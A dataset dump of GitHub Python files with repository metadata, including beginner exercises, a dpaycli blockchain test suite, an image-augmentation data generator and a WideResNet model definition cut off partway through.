| column | dtype | range / values |
| --- | --- | --- |
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–616 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |

blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author_id
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
52fa7f6ab35d271fd30dbc1f96ddcee4a2df32b5 | e74c2e5b85b9af58a6f9b4b6eea160fb66f6bb08 | /aula11.py | a14bb8b989d099d4f7350a32cb0c4b75eb76c49b | []
| no_license | Nokutomi/AulaPython | 670cc27986aa3a12e528f5d1602929a524b632fc | 1e97e4821b12a0ad0a4438d682c1e4d61a10f61d | refs/heads/master | 2022-11-15T08:38:47.401055 | 2020-07-08T02:49:54 | 2020-07-08T02:49:54 | 275,640,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py |
lista = [1,10]
arquivo = open('teste.txt', 'r')
try:
texto = arquivo.read()
divisao = 10 / 0
# numero = lista[3]
# x = a
# print('Fechando arquivo')
# arquivo.close()
except ZeroDivisionError:
print('Nao e possivel realizar uma divisao por zero')
except ArithmeticError:
print('Houve um erro ao realizar uma operacao aritmetica')
except IndexError:
print('Erro ao acessar um indice invalido da lista')
except Exception as ex:
print('Erro desconhecido. Erro: {}'.format(ex))
else:
print('Executa quando nao ocorre excecao')
finally:
print('Sempre executa')
print('Fechando arquivo')
arquivo.close()
| [
"[email protected]"
]
| |
a02a2341ab021509e596e6ab801c9b00af24f937 | 988385035443e5d46d29d96b15179509fd1c782e | /addToArrayForm.py | ea09a01733d9a2d3d3b61c25a1837f7b7368545e | []
| no_license | mwoitek/leetcode-python3 | c120ee1b1eb8e17f3a301026f25c643be9852953 | eb9989d3768eba82275a57243c99796e74ccdd48 | refs/heads/master | 2022-12-28T21:19:51.215210 | 2020-10-18T06:17:27 | 2020-10-18T06:17:27 | 301,295,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | class Solution:
def addToArrayForm(self, A: List[int], K: int) -> List[int]:
A_str = "".join([str(num) for num in A])
A_int = int(A_str)
ans = A_int + K
ans_list = [int(char) for char in str(ans)]
return ans_list
| [
"[email protected]"
]
| |
7091c8bb4d092cb28c4a6f0d1fe1a329abcb2805 | 40b20d7e5f4381a64bd264a562c4ae6d6721b01c | /14-it-generator/sentence_gen.py | a17c48f6811da8c5180ec412bacbf4618080cabf | [
"MIT"
]
| permissive | KyrieCham/example-code | 7d2f0d5901bf80b49dd6b1e9ae1c37c9cb6df7f5 | 3dd11744d1c0b1f00860e985ee2a0761e73ef7e7 | refs/heads/master | 2020-04-18T00:56:06.384756 | 2019-01-22T19:27:43 | 2019-01-22T19:27:43 | 167,098,245 | 1 | 0 | MIT | 2019-01-23T01:52:48 | 2019-01-23T01:52:47 | null | UTF-8 | Python | false | false | 446 | py | """
Sentence: iterate over words using a generator function
"""
import re
import reprlib
RE_WORD = re.compile(r'\w+')
class Sentence:
def __init__(self, text):
self.text = text
self.words = RE_WORD.findall(text)
def __repr__(self):
return 'Sentence(%s)' % reprlib.repr(self.text)
def __iter__(self):
for word in self.words: # <1>
yield word # <2>
return # <3>
# done! <4>
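if __name__ == '__main__':
    # Usage sketch (added illustration, not part of the book example): iteration is
    # lazy, and every new iteration over the Sentence gets a fresh generator.
    s = Sentence('"The time has come," the Walrus said')
    print(list(s))  # -> ['The', 'time', 'has', 'come', 'the', 'Walrus', 'said']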
| [
"[email protected]"
]
| |
c14cca36fd70f17c4adf7cf1050a549b485a5112 | dd44e145ac547209f5f209bc9b1f09189bb8b5c7 | /Python-OOP-July2021/04.Classes_and_objects-E/05.To-do-list/project/section.py | 391f64c88e1e7f0db3acc9df9b8d20c2de06a156 | []
| no_license | todorovventsi/Software-Engineering | e3c1be8f0f72c85619518bb914d2a4dbaac270f8 | 64ffa6c80b190e7c6f340aaf219986f769f175ab | refs/heads/master | 2023-07-09T05:35:14.522958 | 2021-08-15T14:35:55 | 2021-08-15T14:35:55 | 336,056,643 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | class Section:
def __init__(self, name):
self.name = name
self.tasks = []
def add_task(self, new_task):
if new_task not in self.tasks:
self.tasks.append(new_task)
return f"Task {new_task.details()} is added to the section"
return f"Task is already in the section {self.name}"
def complete_task(self, task_name):
for task in self.tasks:
if task.name == task_name:
task.completed = True
return f"Completed task {task.name}"
return f"Could not find task with the name {task_name}"
    def clean_section(self):
        # iterate over a copy: removing items from self.tasks while looping over it would skip entries
        completed_tasks = [task for task in self.tasks if task.completed]
        for task in completed_tasks:
            self.tasks.remove(task)
        return f"Cleared {len(completed_tasks)} tasks."
def view_section(self):
first_row = f"Section {self.name}:\n"
next_rows = [f"{task.details()}\n" for task in self.tasks]
return f"{first_row}{''.join(next_rows)}"
| [
"[email protected]"
]
| |
f6f84dcc3656ac3c623fa8ecd4bfcedf2259c2ef | a22cc323b29f50da397d8363ac2521e3542a0fd7 | /tests/dpaycli/test_steem.py | d04f4ac3d9988e261ae2bc7c834ff2c3642c4d91 | [
"MIT"
]
| permissive | dpays/dpay-cli | 1a58c7dae45218e3b05b7e17ff5ce03e918d27b9 | dfa80898e1faea2cee92ebec6fe04873381bd40f | refs/heads/master | 2020-04-01T09:26:43.200933 | 2018-10-15T08:03:06 | 2018-10-15T08:03:06 | 153,075,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,444 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import range
from builtins import super
import mock
import string
import unittest
from parameterized import parameterized
import random
import json
from pprint import pprint
from dpaycli import DPay, exceptions
from dpaycli.amount import Amount
from dpaycli.memo import Memo
from dpaycli.version import version as dpaycli_version
from dpaycli.wallet import Wallet
from dpaycli.witness import Witness
from dpaycli.account import Account
from dpaycligraphenebase.account import PrivateKey
from dpaycli.instance import set_shared_dpay_instance
from dpaycli.nodelist import NodeList
# Py3 compatibility
import sys
wif = "5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3"
class Testcases(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.nodelist = NodeList()
cls.nodelist.update_nodes(dpay_instance=DPay(node=cls.nodelist.get_nodes(normal=True, appbase=True), num_retries=10))
cls.bts = DPay(
node=cls.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
cls.testnet = DPay(
node="https://testnet.dpaydev.com",
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
cls.account = Account("test", full=True, dpay_instance=cls.bts)
cls.account_testnet = Account("test", full=True, dpay_instance=cls.testnet)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_transfer(self, node_param):
if node_param == "normal":
bts = self.bts
acc = self.account
elif node_param == "testnet":
bts = self.testnet
acc = self.account_testnet
acc.dpay.txbuffer.clear()
tx = acc.transfer(
"test", 1.33, "BBD", memo="Foobar", account="test1")
self.assertEqual(
tx["operations"][0][0],
"transfer"
)
self.assertEqual(len(tx["operations"]), 1)
op = tx["operations"][0][1]
self.assertIn("memo", op)
self.assertEqual(op["memo"], "Foobar")
self.assertEqual(op["from"], "test1")
self.assertEqual(op["to"], "test")
amount = Amount(op["amount"], dpay_instance=bts)
self.assertEqual(float(amount), 1.33)
def test_create_account(self):
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
core_unit = "DWB"
name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
key1 = PrivateKey()
key2 = PrivateKey()
key3 = PrivateKey()
key4 = PrivateKey()
key5 = PrivateKey()
bts.txbuffer.clear()
tx = bts.create_account(
name,
creator="test", # 1.2.7
owner_key=format(key1.pubkey, core_unit),
active_key=format(key2.pubkey, core_unit),
posting_key=format(key3.pubkey, core_unit),
memo_key=format(key4.pubkey, core_unit),
additional_owner_keys=[format(key5.pubkey, core_unit)],
additional_active_keys=[format(key5.pubkey, core_unit)],
additional_posting_keys=[format(key5.pubkey, core_unit)],
additional_owner_accounts=["test1"], # 1.2.0
additional_active_accounts=["test1"],
storekeys=False,
)
self.assertEqual(
tx["operations"][0][0],
"account_create"
)
op = tx["operations"][0][1]
role = "active"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "posting"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "owner"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
self.assertEqual(
op["creator"],
"test")
def test_create_account_password(self):
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
core_unit = "DWB"
name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
key5 = PrivateKey()
bts.txbuffer.clear()
tx = bts.create_account(
name,
creator="test", # 1.2.7
password="abcdefg",
additional_owner_keys=[format(key5.pubkey, core_unit)],
additional_active_keys=[format(key5.pubkey, core_unit)],
additional_posting_keys=[format(key5.pubkey, core_unit)],
additional_owner_accounts=["test1"], # 1.2.0
additional_active_accounts=["test1"],
storekeys=False,
)
self.assertEqual(
tx["operations"][0][0],
"account_create"
)
op = tx["operations"][0][1]
role = "active"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "owner"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
self.assertEqual(
op["creator"],
"test")
@parameterized.expand([
("normal"),
("testnet"),
])
def test_connect(self, node_param):
if node_param == "normal":
bts = self.bts
elif node_param == "testnet":
bts = self.testnet
bts.connect()
@parameterized.expand([
("normal"),
("testnet"),
])
def test_info(self, node_param):
if node_param == "normal":
bts = self.bts
elif node_param == "testnet":
bts = self.testnet
info = bts.info()
for key in ['current_witness',
'head_block_id',
'head_block_number',
'id',
'last_irreversible_block_num',
'current_witness',
'total_pow',
'time']:
self.assertTrue(key in info)
def test_finalizeOps(self):
bts = self.bts
acc = self.account
tx1 = bts.new_tx()
tx2 = bts.new_tx()
acc.transfer("test1", 1, "BEX", append_to=tx1)
acc.transfer("test1", 2, "BEX", append_to=tx2)
acc.transfer("test1", 3, "BEX", append_to=tx1)
tx1 = tx1.json()
tx2 = tx2.json()
ops1 = tx1["operations"]
ops2 = tx2["operations"]
self.assertEqual(len(ops1), 2)
self.assertEqual(len(ops2), 1)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_weight_threshold(self, node_param):
if node_param == "normal":
bts = self.bts
pkey1 = 'DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
pkey2 = 'DWB7GM9YXcsoAJAgKbqW2oVj7bnNXFNL4pk9NugqKWPmuhoEDbkDv'
elif node_param == "testnet":
bts = self.testnet
pkey1 = 'TST55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
pkey2 = 'TST7GM9YXcsoAJAgKbqW2oVj7bnNXFNL4pk9NugqKWPmuhoEDbkDv'
auth = {'account_auths': [['test', 1]],
'extensions': [],
'key_auths': [
[pkey1, 1],
[pkey2, 1]],
'weight_threshold': 3} # threshold fine
bts._test_weights_treshold(auth)
auth = {'account_auths': [['test', 1]],
'extensions': [],
'key_auths': [
[pkey1, 1],
[pkey2, 1]],
'weight_threshold': 4} # too high
with self.assertRaises(ValueError):
bts._test_weights_treshold(auth)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_allow(self, node_param):
if node_param == "normal":
bts = self.bts
acc = self.account
prefix = "DWB"
wif = "DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
elif node_param == "testnet":
bts = self.testnet
acc = self.account_testnet
prefix = "TST"
wif = "TST55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
self.assertIn(bts.prefix, prefix)
tx = acc.allow(
wif,
account="test",
weight=1,
threshold=1,
permission="owner",
)
self.assertEqual(
(tx["operations"][0][0]),
"account_update"
)
op = tx["operations"][0][1]
self.assertIn("owner", op)
self.assertIn(
[wif, '1'],
op["owner"]["key_auths"])
self.assertEqual(op["owner"]["weight_threshold"], 1)
def test_disallow(self):
acc = self.account
pkey1 = "DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
pkey2 = "DWB6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV"
if sys.version > '3':
_assertRaisesRegex = self.assertRaisesRegex
else:
_assertRaisesRegex = self.assertRaisesRegexp
with _assertRaisesRegex(ValueError, ".*Changes nothing.*"):
acc.disallow(
pkey1,
weight=1,
threshold=1,
permission="owner"
)
with _assertRaisesRegex(ValueError, ".*Changes nothing!.*"):
acc.disallow(
pkey2,
weight=1,
threshold=1,
permission="owner"
)
def test_update_memo_key(self):
acc = self.account
prefix = "DWB"
pkey = 'DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
self.assertEqual(acc.dpay.prefix, prefix)
acc.dpay.txbuffer.clear()
tx = acc.update_memo_key(pkey)
self.assertEqual(
(tx["operations"][0][0]),
"account_update"
)
op = tx["operations"][0][1]
self.assertEqual(
op["memo_key"],
pkey)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_approvewitness(self, node_param):
if node_param == "normal":
w = self.account
elif node_param == "testnet":
w = self.account_testnet
w.dpay.txbuffer.clear()
tx = w.approvewitness("test1")
self.assertEqual(
(tx["operations"][0][0]),
"account_witness_vote"
)
op = tx["operations"][0][1]
self.assertIn(
"test1",
op["witness"])
def test_post(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.post("title", "body", author="test", permlink=None, reply_identifier=None,
json_metadata=None, comment_options=None, community="test", tags=["a", "b", "c", "d", "e"],
beneficiaries=[{'account': 'test1', 'weight': 5000}, {'account': 'test2', 'weight': 5000}], self_vote=True)
self.assertEqual(
(tx["operations"][0][0]),
"comment"
)
op = tx["operations"][0][1]
self.assertEqual(op["body"], "body")
self.assertEqual(op["title"], "title")
self.assertEqual(op["permlink"], "title")
self.assertEqual(op["parent_author"], "")
self.assertEqual(op["parent_permlink"], "a")
json_metadata = json.loads(op["json_metadata"])
self.assertEqual(json_metadata["tags"], ["a", "b", "c", "d", "e"])
self.assertEqual(json_metadata["app"], "dpaycli/%s" % (dpaycli_version))
self.assertEqual(
(tx["operations"][1][0]),
"comment_options"
)
op = tx["operations"][1][1]
self.assertEqual(len(op['extensions'][0][1]['beneficiaries']), 2)
def test_comment_option(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.comment_options({}, "@gtg/witness-gtg-log", account="test")
self.assertEqual(
(tx["operations"][0][0]),
"comment_options"
)
op = tx["operations"][0][1]
self.assertIn(
"gtg",
op["author"])
self.assertEqual('1000000.000 BBD', op["max_accepted_payout"])
self.assertEqual(10000, op["percent_dpay_dollars"])
self.assertEqual(True, op["allow_votes"])
self.assertEqual(True, op["allow_curation_rewards"])
self.assertEqual("witness-gtg-log", op["permlink"])
def test_online(self):
bts = self.bts
self.assertFalse(bts.get_blockchain_version() == '0.0.0')
def test_offline(self):
bts = DPay(node=self.nodelist.get_nodes(),
offline=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif})
bts.refresh_data()
self.assertTrue(bts.get_reserve_ratio(use_stored_data=False) is None)
self.assertTrue(bts.get_reserve_ratio(use_stored_data=True) is None)
self.assertTrue(bts.get_feed_history(use_stored_data=False) is None)
self.assertTrue(bts.get_feed_history(use_stored_data=True) is None)
self.assertTrue(bts.get_reward_funds(use_stored_data=False) is None)
self.assertTrue(bts.get_reward_funds(use_stored_data=True) is None)
self.assertTrue(bts.get_current_median_history(use_stored_data=False) is None)
self.assertTrue(bts.get_current_median_history(use_stored_data=True) is None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=False) is None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=True) is None)
self.assertTrue(bts.get_network(use_stored_data=False) is None)
self.assertTrue(bts.get_network(use_stored_data=True) is None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=False) is None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=True) is None)
self.assertTrue(bts.get_config(use_stored_data=False) is None)
self.assertTrue(bts.get_config(use_stored_data=True) is None)
self.assertEqual(bts.get_block_interval(), 3)
self.assertEqual(bts.get_blockchain_version(), '0.0.0')
@parameterized.expand([
("normal"),
("testnet"),
])
def test_properties(self, node_param):
if node_param == "normal":
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
elif node_param == "testnet":
bts = DPay(node="https://testnet.dpaydev.com",
nobroadcast=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
self.assertTrue(bts.get_reserve_ratio(use_stored_data=False) is not None)
self.assertTrue(bts.get_feed_history(use_stored_data=False) is not None)
self.assertTrue(bts.get_reward_funds(use_stored_data=False) is not None)
self.assertTrue(bts.get_current_median_history(use_stored_data=False) is not None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=False) is not None)
self.assertTrue(bts.get_network(use_stored_data=False) is not None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=False) is not None)
self.assertTrue(bts.get_config(use_stored_data=False) is not None)
self.assertTrue(bts.get_block_interval() is not None)
self.assertTrue(bts.get_blockchain_version() is not None)
def test_bp_to_rshares(self):
stm = self.bts
rshares = stm.bp_to_rshares(stm.vests_to_sp(1e6))
self.assertTrue(abs(rshares - 20000000000.0) < 2)
def test_rshares_to_vests(self):
stm = self.bts
rshares = stm.bp_to_rshares(stm.vests_to_sp(1e6))
rshares2 = stm.vests_to_rshares(1e6)
self.assertTrue(abs(rshares - rshares2) < 2)
def test_bp_to_bbd(self):
stm = self.bts
bp = 500
ret = stm.bp_to_bbd(bp)
self.assertTrue(ret is not None)
def test_bbd_to_rshares(self):
stm = self.bts
test_values = [1, 10, 100, 1e3, 1e4, 1e5, 1e6, 1e7]
for v in test_values:
try:
bbd = round(stm.rshares_to_bbd(stm.bbd_to_rshares(v)), 5)
except ValueError: # Reward pool smaller than 1e7 BBD (e.g. caused by a very low BEX price)
continue
self.assertEqual(bbd, v)
def test_rshares_to_vote_pct(self):
stm = self.bts
bp = 1000
voting_power = 9000
for vote_pct in range(500, 10000, 500):
rshares = stm.bp_to_rshares(bp, voting_power=voting_power, vote_pct=vote_pct)
vote_pct_ret = stm.rshares_to_vote_pct(rshares, dpay_power=bp, voting_power=voting_power)
self.assertEqual(vote_pct_ret, vote_pct)
def test_sign(self):
bts = self.bts
with self.assertRaises(
exceptions.MissingKeyError
):
bts.sign()
def test_broadcast(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.comment_options({}, "@gtg/witness-gtg-log", account="test")
# tx = bts.sign()
with self.assertRaises(
exceptions.MissingKeyError
):
bts.broadcast(tx=tx)
| [
"[email protected]"
]
| |
9999bf5d93fa20451f61973a2e0ae14307aded8d | 4b1cf07275a8f2abf30943b975d443485ef897ff | /data_generator.py | 3805e30c71100e78de5cec92ba0c561a77bb426d | [
"MIT"
]
| permissive | gipsyblues/edge_ml_emotion_recognition | a0e1e0acc98d11f710542218b2603f72a8a93a4b | 028e9a9264e7df5c48a047677b48f0c15e059e6c | refs/heads/master | 2023-06-27T02:53:18.707806 | 2021-07-28T06:48:30 | 2021-07-28T06:48:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,108 | py | import numpy as np
import cv2
import os
import imgaug as ia
import logging
from imgaug import augmenters as iaa
from imgaug.augmentables.segmaps import SegmentationMapsOnImage
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
def _create_augment_pipeline():
sometimes = lambda aug: iaa.Sometimes(0.1, aug)
aug_pipe = iaa.Sequential(
[
iaa.Fliplr(0.5),
#iaa.Flipud(0.2),
iaa.Affine(translate_percent={"x": (-0.1, 0.1), "y": (-0.1, 0.1)}),
iaa.OneOf([iaa.Affine(scale=(0.8, 1.2)),
iaa.Affine(rotate=(-10, 10)),
iaa.Affine(shear=(-10, 10))]),
sometimes(iaa.OneOf([
iaa.GaussianBlur((0, 3.0)),
iaa.AverageBlur(k=(2, 7)),
iaa.MedianBlur(k=(3, 11)),
])),
sometimes(iaa.Sharpen(alpha=(0, 1.0), lightness=(0.75, 1.5))),
sometimes(iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.05 * 255), per_channel=0.5)),
sometimes(iaa.OneOf([
iaa.Dropout((0.01, 0.1), per_channel=0.5),
iaa.CoarseDropout((0.03, 0.15), size_percent=(0.02, 0.05), per_channel=0.2),
])),
sometimes(iaa.Add((-10, 10), per_channel=0.5)),
sometimes(iaa.Multiply((0.5, 1.5), per_channel=0.5)),
sometimes(iaa.ContrastNormalization((0.5, 2.0), per_channel=0.5))
],
random_order=True
)
return aug_pipe
def process_image_classification(image, desired_w = None, desired_h = None, aug_pipe = None):
# resize the image to standard size
if (desired_w and desired_h) or aug_pipe:
if (desired_w and desired_h):
# Rescale image
image = ia.imresize_single_image(image, (desired_w, desired_h))
if aug_pipe:
image = aug_pipe(image=image)
return image
class DataGenerator():
def __init__(self, X_train, y_train, batch_size=32, img_size = 48, prefix='appa-real/imgs/', shuffle=True, augment=None):
self.X_train = X_train
self.y_train = y_train
self.batch_size = batch_size
self.img_size = img_size
self.prefix = prefix
self.class_num = y_train.shape[1]
self.shuffle = shuffle
self.sample_num = len(X_train)
self.augment = augment
if self.augment:
            logging.info(f"Using augmentation for {self.prefix}")
self.aug_pipe = _create_augment_pipeline()
def __call__(self):
while True:
indexes = self.__get_exploration_order()
itr_num = int(len(indexes) // (self.batch_size * 2))
for i in range(itr_num):
batch_ids = indexes[i * self.batch_size * 2:(i + 1) * self.batch_size * 2]
X, y = self.__data_generation(batch_ids)
yield X, y
def __get_exploration_order(self):
indexes = np.arange(self.sample_num)
if self.shuffle:
np.random.shuffle(indexes)
return indexes
def __data_generation(self, batch_ids):
X = np.zeros(shape=(self.batch_size, self.img_size, self.img_size, 3))
y = np.zeros(shape=(self.batch_size, self.class_num))
for i in range(self.batch_size):
img = cv2.imread(self.prefix + self.X_train[batch_ids[i]], 1)
try:
if self.augment:
img = process_image_classification(img, self.img_size, self.img_size, self.aug_pipe)
except Exception as e:
print(self.prefix + self.X_train[batch_ids[i]], e)
img = img.astype(np.float32)
img /= 255.
img -= 0.5
img *= 2.
img = img[:, :, ::-1]
X[i, ::] = img
y[i, :] = self.y_train[batch_ids[i]]
return np.array(X), y
| [
"[email protected]"
]
| |
ca9547928ab7a957dabd169f16fc201dc6d06efe | b83ff584bfcd9fce7a337ba1253287fc9afd03c7 | /cmdline_fluency_countdown.py | c6564c0a2aa5dcf88e15805c147edba2570aebac | []
| no_license | houstonhunt/fluencycountdown | 6166eaf625f6e348213dcd5be8045ee218159900 | d555b83972e05d09e1caafca61ea465c4ca3770c | refs/heads/master | 2021-01-23T23:12:17.392090 | 2015-05-23T18:48:24 | 2015-05-23T18:48:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,720 | py | #!/usr/bin/python
# cmdline_fluency_countdown.py
import pickle # used to save user progress (currently supporting 1 primary user)
import ConfigParser, os # used to parse language file
def init():
state = 0
try:
pickle.load(open("save.p", "rb"))
print "SUCCESS: loaded save file!"
state = 1
except:
config = ConfigParser.ConfigParser()
config.read('lang.cfg')
print "WELCOME: no save file found!"
print "Type a [language] you want to learn (example: English),"
print " or [list] then press [ENTER]"
selected_lang = raw_input()
# joke
if selected_lang == "English":
print "You already know English!"
quit()
elif selected_lang == "list":
list(selected_lang, config)
        elif selected_lang:  # assumption: the source line was cut off here; treat any other entry as a language choice
            print "You chose to learn " + selected_lang
def list(what, cp):
if what == "list":
print "list what? [all] [easy] [medium] [hard] [other] [about]"
selected_lang = raw_input()
if selected_lang == "all":
list1(cp)
list2(cp)
list3(cp)
listo(cp)
elif selected_lang == "easy":
list1(cp)
elif selected_lang == "medium":
list2(cp)
elif selected_lang == "hard":
list3(cp)
elif selected_lang == "other":
listo(cp)
elif selected_lang == "about":
print "Coded by Houston Hunt"
print "Times to mastering a language for English speakers"
print "is given by " + str(cp.get('Reference', 'reference'))
def list1(cp):
print cp.get('Languages', 'desc1')
print str(cp.get('Languages', 'cat1'))
def list2(cp):
print str(cp.get('Languages', 'desc2'))
print str(cp.get('Languages', 'cat2'))
def list3(cp):
print str(cp.get('Languages', 'desc3'))
print str(cp.get('Languages', 'cat3'))
def listo(cp):
print str(cp.get('Languages', 'desco'))
print str(cp.get('Languages', 'other'))
init()
| [
"[email protected]"
]
| |
09db4be45d5d63793dcd85353daabc9d84d3ac5d | 08ca7028e0488c420fff8c831e9d4fd3e32ee292 | /models/wideresnet.py | 59ba6496518eab9bc92f85bceb9a2459910e4762 | []
| no_license | yogeshbalaji/Adversarial-training | 0ee53fdbef2742788cbbc73ca592738347076fe2 | 3593c836f39c1313545fcc71e5ba8afa6f427326 | refs/heads/master | 2020-07-15T03:00:26.425582 | 2019-09-04T19:59:51 | 2019-09-04T19:59:51 | 205,464,494 | 12 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,517 | py | from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from utils import data_normalize
def init_weight(*args):
return nn.Parameter(nn.init.kaiming_normal_(torch.zeros(*args), mode='fan_out', nonlinearity='relu'))
class Block(nn.Module):
"""
Pre-activated ResNet block.
"""
def __init__(self, width):
super().__init__()
self.bn0 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv0', init_weight(width, width, 3, 3))
self.bn1 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv1', init_weight(width, width, 3, 3))
def forward(self, x):
h = F.conv2d(F.relu(self.bn0(x)), self.conv0, padding=1)
h = F.conv2d(F.relu(self.bn1(h)), self.conv1, padding=1)
return x + h
class DownsampleBlock(nn.Module):
"""
Downsample block.
Does F.avg_pool2d + torch.cat instead of strided conv.
"""
def __init__(self, width):
super().__init__()
self.bn0 = nn.BatchNorm2d(width // 2, affine=False)
self.register_parameter('conv0', init_weight(width, width // 2, 3, 3))
self.bn1 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv1', init_weight(width, width, 3, 3))
def forward(self, x):
h = F.conv2d(F.relu(self.bn0(x)), self.conv0, padding=1, stride=2)
h = F.conv2d(F.relu(self.bn1(h)), self.conv1, padding=1)
x_d = F.avg_pool2d(x, kernel_size=3, padding=1, stride=2)
x_d = torch.cat([x_d, torch.zeros_like(x_d)], dim=1)
return x_d + h
class WRN(nn.Module):
"""
Implementation of modified Wide Residual Network.
Differences with pre-activated ResNet and Wide ResNet:
* BatchNorm has no affine weight and bias parameters
* First layer has 16 * width channels
* Last fc layer is removed in favor of 1x1 conv + F.avg_pool2d
* Downsample is done by F.avg_pool2d + torch.cat instead of strided conv
First and last convolutional layers are kept in float32.
"""
def __init__(self, depth, width, num_classes):
super().__init__()
widths = [int(v * width) for v in (16, 32, 64)]
n = (depth - 2) // 6
self.register_parameter('conv0', init_weight(widths[0], 3, 3, 3))
self.group0 = self._make_block(widths[0], n)
